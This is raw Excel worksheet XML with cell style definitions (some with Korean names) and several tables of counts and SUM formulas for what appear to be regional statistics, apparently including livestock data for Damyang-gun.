    <xf numFmtId="0" fontId="7" fillId="38" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="38" xfId="0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14" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="14" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="14" borderId="21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7" fillId="41" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="41" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="41" borderId="38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right"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="13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38" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="38" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="38" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="3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7" fillId="38" borderId="21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right"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="73" fillId="38" borderId="21" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="73" fillId="38" borderId="20" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="73" fillId="38" borderId="21" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="38" borderId="21" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="38" borderId="20" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="37" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="38" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="2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right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="38" borderId="13" xfId="72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/>
    </xf>
  </cellXfs>
  <cellStyles count="7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강조색1" xfId="45"/>
    <cellStyle name="강조색2" xfId="46"/>
    <cellStyle name="강조색3" xfId="47"/>
    <cellStyle name="강조색4" xfId="48"/>
    <cellStyle name="강조색5" xfId="49"/>
    <cellStyle name="강조색6" xfId="50"/>
    <cellStyle name="경고문" xfId="51"/>
    <cellStyle name="계산" xfId="52"/>
    <cellStyle name="咬訌裝?INCOM1" xfId="53"/>
    <cellStyle name="咬訌裝?INCOM10" xfId="54"/>
    <cellStyle name="咬訌裝?INCOM2" xfId="55"/>
    <cellStyle name="咬訌裝?INCOM3" xfId="56"/>
    <cellStyle name="咬訌裝?INCOM4" xfId="57"/>
    <cellStyle name="咬訌裝?INCOM5" xfId="58"/>
    <cellStyle name="咬訌裝?INCOM6" xfId="59"/>
    <cellStyle name="咬訌裝?INCOM7" xfId="60"/>
    <cellStyle name="咬訌裝?INCOM8" xfId="61"/>
    <cellStyle name="咬訌裝?INCOM9" xfId="62"/>
    <cellStyle name="咬訌裝?PRIB11" xfId="63"/>
    <cellStyle name="나쁨" xfId="64"/>
    <cellStyle name="메모" xfId="65"/>
    <cellStyle name="Percent" xfId="66"/>
    <cellStyle name="보통" xfId="67"/>
    <cellStyle name="뷭?_BOOKSHIP" xfId="68"/>
    <cellStyle name="설명 텍스트" xfId="69"/>
    <cellStyle name="셀 확인" xfId="70"/>
    <cellStyle name="Comma" xfId="71"/>
    <cellStyle name="Comma [0]" xfId="72"/>
    <cellStyle name="쉼표 [0]_06년 상반기 주요 가축통계 총괄(담양군)" xfId="73"/>
    <cellStyle name="연결된 셀" xfId="74"/>
    <cellStyle name="Followed Hyperlink" xfId="75"/>
    <cellStyle name="요약" xfId="76"/>
    <cellStyle name="입력" xfId="77"/>
    <cellStyle name="제목" xfId="78"/>
    <cellStyle name="제목 1" xfId="79"/>
    <cellStyle name="제목 2" xfId="80"/>
    <cellStyle name="제목 3" xfId="81"/>
    <cellStyle name="제목 4" xfId="82"/>
    <cellStyle name="좋음" xfId="83"/>
    <cellStyle name="출력" xfId="84"/>
    <cellStyle name="콤마 [0]_1202" xfId="85"/>
    <cellStyle name="콤마_1202" xfId="86"/>
    <cellStyle name="Currency" xfId="87"/>
    <cellStyle name="Currency [0]" xfId="88"/>
    <cellStyle name="표준_kc-elec system check list" xfId="89"/>
    <cellStyle name="Hyperlink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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.25390625" style="0" customWidth="1"/>
    <col min="2" max="2" width="10.125" style="0" customWidth="1"/>
    <col min="3" max="15" width="8.50390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>309</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162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 t="s">
        <v>326</v>
      </c>
      <c r="O2" s="15"/>
    </row>
    <row r="3" spans="1:15" ht="18" customHeight="1">
      <c r="A3" s="49" t="s">
        <v>182</v>
      </c>
      <c r="B3" s="49" t="s">
        <v>185</v>
      </c>
      <c r="C3" s="51" t="s">
        <v>166</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>167</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>168</v>
      </c>
      <c r="F3" s="50" t="s">
        <v>169</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>170</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>171</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>172</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>173</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>174</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>320</v>
      </c>
      <c r="M3" s="50" t="s">
        <v>321</v>
      </c>
      <c r="N3" s="50" t="s">
        <v>175</v>
      </c>
      <c r="O3" s="50" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="4" spans="1:16" ht="18" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="53">
        <f aca="true" t="shared" si="0" ref="B4:O4">SUM(B5:B15)</f>
        <v>14</v>
      </c>
      <c r="C4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="H4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="I4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="L4" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="M4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="N4" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="O4" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P4" s="15"/>
    </row>
    <row r="5" spans="1:16" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="82">
        <f>SUM(C5:O5)</f>
        <v>2</v>
      </c>
      <c r="C5" s="23"/>
      <c r="D5" s="23"/>
      <c r="E5" s="23"/>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="23"/>
      <c r="K5" s="23">
        <v>2</v>
      </c>
      <c r="L5" s="23"/>
      <c r="M5" s="23"/>
      <c r="N5" s="23"/>
      <c r="O5" s="23"/>
      <c r="P5" s="43"/>
    </row>
    <row r="6" spans="1:16" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="82">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:O6)</f>
        <v>0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43"/>
    </row>
    <row r="7" spans="1:16" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="82">
        <f t="shared" si="1"/>
        <v>2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/>
      <c r="L7" s="23">
        <v>2</v>
      </c>
      <c r="M7" s="23">
        <v>0</v>
      </c>
      <c r="N7" s="23">
        <v>0</v>
      </c>
      <c r="O7" s="23">
        <v>0</v>
      </c>
      <c r="P7" s="43"/>
    </row>
    <row r="8" spans="1:16" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="82">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="C8" s="23"/>
      <c r="D8" s="23"/>
      <c r="E8" s="23"/>
      <c r="F8" s="23"/>
      <c r="G8" s="23">
        <v>1</v>
      </c>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23">
        <v>1</v>
      </c>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="23"/>
      <c r="O8" s="23"/>
      <c r="P8" s="43"/>
    </row>
    <row r="9" spans="1:16" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="82">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="C9" s="23"/>
      <c r="D9" s="23"/>
      <c r="E9" s="23"/>
      <c r="F9" s="23"/>
      <c r="G9" s="23"/>
      <c r="H9" s="23"/>
      <c r="I9" s="23"/>
      <c r="J9" s="23"/>
      <c r="K9" s="23"/>
      <c r="L9" s="23">
        <v>1</v>
      </c>
      <c r="M9" s="23"/>
      <c r="N9" s="23"/>
      <c r="O9" s="23"/>
      <c r="P9" s="43"/>
    </row>
    <row r="10" spans="1:16" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="82">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C10" s="23"/>
      <c r="D10" s="23"/>
      <c r="E10" s="23"/>
      <c r="F10" s="23"/>
      <c r="G10" s="23"/>
      <c r="H10" s="23">
        <v>1</v>
      </c>
      <c r="I10" s="23"/>
      <c r="J10" s="23"/>
      <c r="K10" s="23"/>
      <c r="L10" s="23"/>
      <c r="M10" s="23">
        <v>2</v>
      </c>
      <c r="N10" s="23"/>
      <c r="O10" s="23"/>
      <c r="P10" s="43"/>
    </row>
    <row r="11" spans="1:16" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="82">
        <f t="shared" si="1"/>
        <v>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>
        <v>1</v>
      </c>
      <c r="N11" s="23"/>
      <c r="O11" s="23"/>
      <c r="P11" s="43"/>
    </row>
    <row r="12" spans="1:16" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="82">
        <f t="shared" si="1"/>
        <v>1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1</v>
      </c>
      <c r="L12" s="23">
        <v>0</v>
      </c>
      <c r="M12" s="23">
        <v>0</v>
      </c>
      <c r="N12" s="23">
        <v>0</v>
      </c>
      <c r="O12" s="23">
        <v>0</v>
      </c>
      <c r="P12" s="43"/>
    </row>
    <row r="13" spans="1:16" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="82">
        <f t="shared" si="1"/>
        <v>0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43"/>
    </row>
    <row r="14" spans="1:16" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="82">
        <f t="shared" si="1"/>
        <v>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>
        <v>1</v>
      </c>
      <c r="O14" s="23"/>
      <c r="P14" s="43"/>
    </row>
    <row r="15" spans="1:16" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="82">
        <f t="shared" si="1"/>
        <v>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>
        <v>1</v>
      </c>
      <c r="N15" s="23"/>
      <c r="O15" s="23"/>
      <c r="P15" s="43"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:D1"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.38" right="0.23" top="0.7874015748031497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pane ySplit="4" topLeftCell="A5" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="A5" sqref="A5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="8.25390625" style="0" customWidth="1"/>
    <col min="2" max="2" width="8.625" style="0" customWidth="1"/>
    <col min="3" max="6" width="7.625" style="0" customWidth="1"/>
    <col min="7" max="7" width="7.50390625" style="0" customWidth="1"/>
    <col min="8" max="8" width="7.125" style="0" customWidth="1"/>
    <col min="9" max="10" width="7.625" style="0" customWidth="1"/>
    <col min="11" max="11" width="8.875" style="0" customWidth="1"/>
    <col min="12" max="13" width="10.25390625" style="0" customWidth="1"/>
    <col min="14" max="14" width="9.50390625" style="0" customWidth="1"/>
    <col min="15" max="15" width="8.625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:15" ht="14.25">
      <c r="A1" s="79" t="s">
        <v>308</v>
      </c>
      <c r="B1" s="79"/>
      <c r="C1" s="79"/>
      <c r="D1" s="79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 t="s">
        <v>325</v>
      </c>
      <c r="O2" s="15"/>
    </row>
    <row r="3" spans="1:15" ht="18" customHeight="1">
      <c r="A3" s="50" t="s">
        <v>181</v>
      </c>
      <c r="B3" s="50" t="s">
        <v>0</v>
      </c>
      <c r="C3" s="51" t="s">
        <v>61</v>
      </c>
      <c r="D3" s="51" t="s">
        <v>62</v>
      </c>
      <c r="E3" s="51" t="s">
        <v>58</v>
      </c>
      <c r="F3" s="50" t="s">
        <v>49</v>
      </c>
      <c r="G3" s="50" t="s">
        <v>63</v>
      </c>
      <c r="H3" s="50" t="s">
        <v>52</v>
      </c>
      <c r="I3" s="50" t="s">
        <v>64</v>
      </c>
      <c r="J3" s="50" t="s">
        <v>65</v>
      </c>
      <c r="K3" s="50" t="s">
        <v>66</v>
      </c>
      <c r="L3" s="50" t="s">
        <v>322</v>
      </c>
      <c r="M3" s="50" t="s">
        <v>323</v>
      </c>
      <c r="N3" s="50" t="s">
        <v>67</v>
      </c>
      <c r="O3" s="50" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="4" spans="1:15" ht="18" customHeight="1">
      <c r="A4" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="57">
        <f aca="true" t="shared" si="0" ref="B4:O4">SUM(B5:B15)</f>
        <v>32413</v>
      </c>
      <c r="C4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H4" s="57">
        <f t="shared" si="0"/>
        <v>100</v>
      </c>
      <c r="I4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K4" s="57">
        <f t="shared" si="0"/>
        <v>3593</v>
      </c>
      <c r="L4" s="57">
        <f t="shared" si="0"/>
        <v>3550</v>
      </c>
      <c r="M4" s="57">
        <f t="shared" si="0"/>
        <v>16870</v>
      </c>
      <c r="N4" s="57">
        <f t="shared" si="0"/>
        <v>8300</v>
      </c>
      <c r="O4" s="57">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:16" ht="18" customHeight="1">
      <c r="A5" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B5" s="85">
        <f>SUM(C5:O5)</f>
        <v>1695</v>
      </c>
      <c r="C5" s="25"/>
      <c r="D5" s="25"/>
      <c r="E5" s="25"/>
      <c r="F5" s="25"/>
      <c r="G5" s="25"/>
      <c r="H5" s="25"/>
      <c r="I5" s="25"/>
      <c r="J5" s="25"/>
      <c r="K5" s="25">
        <v>1695</v>
      </c>
      <c r="L5" s="25"/>
      <c r="M5" s="25"/>
      <c r="N5" s="25"/>
      <c r="O5" s="25"/>
      <c r="P5" s="136">
        <v>1695</v>
      </c>
    </row>
    <row r="6" spans="1:16" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B6" s="85">
        <f aca="true" t="shared" si="1" ref="B6:B15">SUM(C6:O6)</f>
        <v>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136">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:16" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B7" s="85">
        <f t="shared" si="1"/>
        <v>2200</v>
      </c>
      <c r="C7" s="25"/>
      <c r="D7" s="25"/>
      <c r="E7" s="25"/>
      <c r="F7" s="25"/>
      <c r="G7" s="25"/>
      <c r="H7" s="25"/>
      <c r="I7" s="25"/>
      <c r="J7" s="25"/>
      <c r="K7" s="25"/>
      <c r="L7" s="25">
        <v>2200</v>
      </c>
      <c r="M7" s="25"/>
      <c r="N7" s="25"/>
      <c r="O7" s="25"/>
      <c r="P7" s="136">
        <v>2200</v>
      </c>
    </row>
    <row r="8" spans="1:16" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B8" s="85">
        <f t="shared" si="1"/>
        <v>990</v>
      </c>
      <c r="C8" s="25"/>
      <c r="D8" s="25"/>
      <c r="E8" s="25"/>
      <c r="F8" s="25"/>
      <c r="G8" s="25"/>
      <c r="H8" s="25">
        <v>40</v>
      </c>
      <c r="I8" s="25"/>
      <c r="J8" s="25"/>
      <c r="K8" s="25">
        <v>950</v>
      </c>
      <c r="L8" s="25"/>
      <c r="M8" s="25"/>
      <c r="N8" s="25"/>
      <c r="O8" s="25"/>
      <c r="P8" s="136">
        <v>990</v>
      </c>
    </row>
    <row r="9" spans="1:16" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B9" s="85">
        <f t="shared" si="1"/>
        <v>1350</v>
      </c>
      <c r="C9" s="25"/>
      <c r="D9" s="25"/>
      <c r="E9" s="25"/>
      <c r="F9" s="25"/>
      <c r="G9" s="25"/>
      <c r="H9" s="25"/>
      <c r="I9" s="25"/>
      <c r="J9" s="25"/>
      <c r="K9" s="25"/>
      <c r="L9" s="25">
        <v>1350</v>
      </c>
      <c r="M9" s="25"/>
      <c r="N9" s="25"/>
      <c r="O9" s="25"/>
      <c r="P9" s="136">
        <v>1350</v>
      </c>
    </row>
    <row r="10" spans="1:16" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B10" s="85">
        <f t="shared" si="1"/>
        <v>7930</v>
      </c>
      <c r="C10" s="25"/>
      <c r="D10" s="25"/>
      <c r="E10" s="25"/>
      <c r="F10" s="25"/>
      <c r="G10" s="25"/>
      <c r="H10" s="25">
        <v>60</v>
      </c>
      <c r="I10" s="25"/>
      <c r="J10" s="25"/>
      <c r="K10" s="25"/>
      <c r="L10" s="25"/>
      <c r="M10" s="25">
        <v>7870</v>
      </c>
      <c r="N10" s="25"/>
      <c r="O10" s="25"/>
      <c r="P10" s="136">
        <v>7930</v>
      </c>
    </row>
    <row r="11" spans="1:16" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B11" s="85">
        <f t="shared" si="1"/>
        <v>2800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>
        <v>2800</v>
      </c>
      <c r="N11" s="25"/>
      <c r="O11" s="25"/>
      <c r="P11" s="136">
        <v>2800</v>
      </c>
    </row>
    <row r="12" spans="1:16" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B12" s="85">
        <f t="shared" si="1"/>
        <v>948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948</v>
      </c>
      <c r="L12" s="25">
        <v>0</v>
      </c>
      <c r="M12" s="25">
        <v>0</v>
      </c>
      <c r="N12" s="25">
        <v>0</v>
      </c>
      <c r="O12" s="25">
        <v>0</v>
      </c>
      <c r="P12" s="136">
        <v>948</v>
      </c>
    </row>
    <row r="13" spans="1:16" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B13" s="85">
        <f t="shared" si="1"/>
        <v>3200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>
        <v>3200</v>
      </c>
      <c r="N13" s="25"/>
      <c r="O13" s="25"/>
      <c r="P13" s="136">
        <v>3200</v>
      </c>
    </row>
    <row r="14" spans="1:16" ht="18" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B14" s="85">
        <f t="shared" si="1"/>
        <v>8300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>
        <v>8300</v>
      </c>
      <c r="O14" s="25"/>
      <c r="P14" s="136">
        <v>8300</v>
      </c>
    </row>
    <row r="15" spans="1:16" ht="18" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B15" s="85">
        <f t="shared" si="1"/>
        <v>3000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>
        <v>3000</v>
      </c>
      <c r="N15" s="25"/>
      <c r="O15" s="25"/>
      <c r="P15" s="136">
        <v>3000</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.48" right="0.47" top="0.7874015748031497" bottom="0.5905511811023623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pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="7.50390625" style="0" customWidth="1"/>
    <col min="2" max="2" width="10.625" style="0" customWidth="1"/>
    <col min="3" max="4" width="9.125" style="0" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="9.50390625" style="0" bestFit="1" customWidth="1"/>
    <col min="6" max="8" width="9.125" style="0" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="10.50390625" style="0" customWidth="1"/>
    <col min="10" max="12" width="9.125" style="0" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>307</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="15"/>
      <c r="F1" s="15"/>
      <c r="G1" s="15"/>
      <c r="H1" s="15"/>
      <c r="I1" s="15"/>
      <c r="J1" s="15"/>
      <c r="K1" s="15"/>
      <c r="L1" s="15"/>
    </row>
    <row r="2" spans="1:12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 t="s">
        <v>327</v>
      </c>
      <c r="L2" s="15"/>
    </row>
    <row r="3" spans="1:12" ht="21" customHeight="1">
      <c r="A3" s="168" t="s">
        <v>180</v>
      </c>
      <c r="B3" s="168" t="s">
        <v>185</v>
      </c>
      <c r="C3" s="169" t="s">
        <v>186</v>
      </c>
      <c r="D3" s="169" t="s">
        <v>187</v>
      </c>
      <c r="E3" s="169" t="s">
        <v>188</v>
      </c>
      <c r="F3" s="168" t="s">
        <v>189</v>
      </c>
      <c r="G3" s="168"/>
      <c r="H3" s="168"/>
      <c r="I3" s="168"/>
      <c r="J3" s="168" t="s">
        <v>190</v>
      </c>
      <c r="K3" s="168"/>
      <c r="L3" s="168"/>
    </row>
    <row r="4" spans="1:12" ht="21" customHeight="1">
      <c r="A4" s="168"/>
      <c r="B4" s="168"/>
      <c r="C4" s="168"/>
      <c r="D4" s="168"/>
      <c r="E4" s="168"/>
      <c r="F4" s="50" t="s">
        <v>191</v>
      </c>
      <c r="G4" s="50" t="s">
        <v>193</v>
      </c>
      <c r="H4" s="50" t="s">
        <v>301</v>
      </c>
      <c r="I4" s="58" t="s">
        <v>194</v>
      </c>
      <c r="J4" s="50" t="s">
        <v>191</v>
      </c>
      <c r="K4" s="50" t="s">
        <v>193</v>
      </c>
      <c r="L4" s="50" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="18" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="53">
        <f aca="true" t="shared" si="0" ref="B5:L5">SUM(B6:B16)</f>
        <v>32413</v>
      </c>
      <c r="C5" s="53">
        <f t="shared" si="0"/>
        <v>3458</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="0"/>
        <v>10697</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>6859</v>
      </c>
      <c r="F5" s="53">
        <f t="shared" si="0"/>
        <v>8685</v>
      </c>
      <c r="G5" s="53">
        <f t="shared" si="0"/>
        <v>5668</v>
      </c>
      <c r="H5" s="53">
        <f t="shared" si="0"/>
        <v>3016</v>
      </c>
      <c r="I5" s="53">
        <f t="shared" si="0"/>
        <v>2046</v>
      </c>
      <c r="J5" s="53">
        <f t="shared" si="0"/>
        <v>2714</v>
      </c>
      <c r="K5" s="53">
        <f t="shared" si="0"/>
        <v>2256</v>
      </c>
      <c r="L5" s="53">
        <f t="shared" si="0"/>
        <v>458</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="114">
        <f aca="true" t="shared" si="1" ref="B6:B16">C6+D6+E6+F6+J6</f>
        <v>1695</v>
      </c>
      <c r="C6" s="23">
        <v>133</v>
      </c>
      <c r="D6" s="23">
        <v>167</v>
      </c>
      <c r="E6" s="23">
        <v>188</v>
      </c>
      <c r="F6" s="113">
        <f aca="true" t="shared" si="2" ref="F6:F15">SUM(G6:H6)</f>
        <v>1207</v>
      </c>
      <c r="G6" s="23">
        <v>576</v>
      </c>
      <c r="H6" s="23">
        <v>631</v>
      </c>
      <c r="I6" s="23">
        <v>175</v>
      </c>
      <c r="J6" s="113">
        <f>SUM(K6:L6)</f>
        <v>0</v>
      </c>
      <c r="K6" s="23"/>
      <c r="L6" s="23"/>
    </row>
    <row r="7" spans="1:12" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C7" s="23"/>
      <c r="D7" s="23"/>
      <c r="E7" s="23"/>
      <c r="F7" s="113">
        <f>SUM(G7:H7)</f>
        <v>0</v>
      </c>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="113">
        <f aca="true" t="shared" si="3" ref="J7:J16">SUM(K7:L7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="23"/>
      <c r="L7" s="23"/>
    </row>
    <row r="8" spans="1:12" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="114">
